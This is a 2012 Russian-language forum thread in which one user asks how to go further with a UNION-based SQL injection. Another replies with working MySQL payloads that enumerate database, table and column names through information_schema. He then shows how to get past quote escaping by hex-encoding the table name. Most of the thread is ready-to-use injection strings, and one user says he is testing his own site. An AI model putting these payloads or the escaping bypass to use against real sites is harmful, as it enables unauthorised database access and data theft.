просмотр таблиц и столбцов
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
просмотр таблиц и столбцов - 2012-04-06 10:50:52.910000
|
|
|
ridlle
Сообщений: 46
Оценки: 0
Присоединился: 2009-06-12 10:43:33.026666
|
есть иньекция ?id=-1+union+select+1,2,version() как можно узнать имя бд, имена таблиц и полей таблиц. то есть нужно выполнить вот такой запрос show databases показать все имена бд show tables in base_name показать все таблицы и как посмотреть все столбы в таблицы я не знаю пробовал вот так ?id=-1+union+show+databases и так ?id=-1+union+select+1,2,show+databases но не катит
|
|
|
RE: просмотр таблиц и столбцов - 2012-04-06 19:03:49.766666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Смотря какая версия и СУБД. Если мускул и 5-ая версия, то: 1-ая БД: ?id=-1+union+select+1,2,schema_name+from+information_schema.schemata+limit+0,1–+ 2-ая БД: ?id=-1+union+select+1,2,schema_name+from+information_schema.schemata+limit+1,1–+ И т.д. Таблицы: ?id=-1+union+select+1,2,table_name+from+information_schema.tables+limit+0,1–+ Колонки в найденной таблице: ?id=-1+union+select+1,2,column_name+from+information_schema.columns+where+table_name='имя таблицы'+limit+0,1–+ И вообще, почитай FAQ по инъекциям…
|
|
|
RE: просмотр таблиц и столбцов - 2012-04-06 20:14:30.040000
|
|
|
ridlle
Сообщений: 46
Оценки: 0
Присоединился: 2009-06-12 10:43:33.026666
|
спасибо. только вот поля в таблицы не получается посмотреть. пишу column_name+from+information_schema.columns+where+table_name='acc'+limit+0,1–+ таблица с таким именем есть. сайт мой и я пришедший параметр сначала пропускаю через ф-цию htmlspecialchars($_GET['id'],ENT_QUOTES) то есть она заменяет кавычки на мнемоничный код(может неправильное название). есть ли вариант как то по другому это сделать?
|
|
|
RE: просмотр таблиц и столбцов - 2012-04-06 20:54:30.060000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
…..where+table_name=0xТАБЛИЦА В HEX(без кавычки)+limit+0,1–+ т.е. в твоём случае where+table_name=0x616363+limit+0,1–+
|
|
|
|
|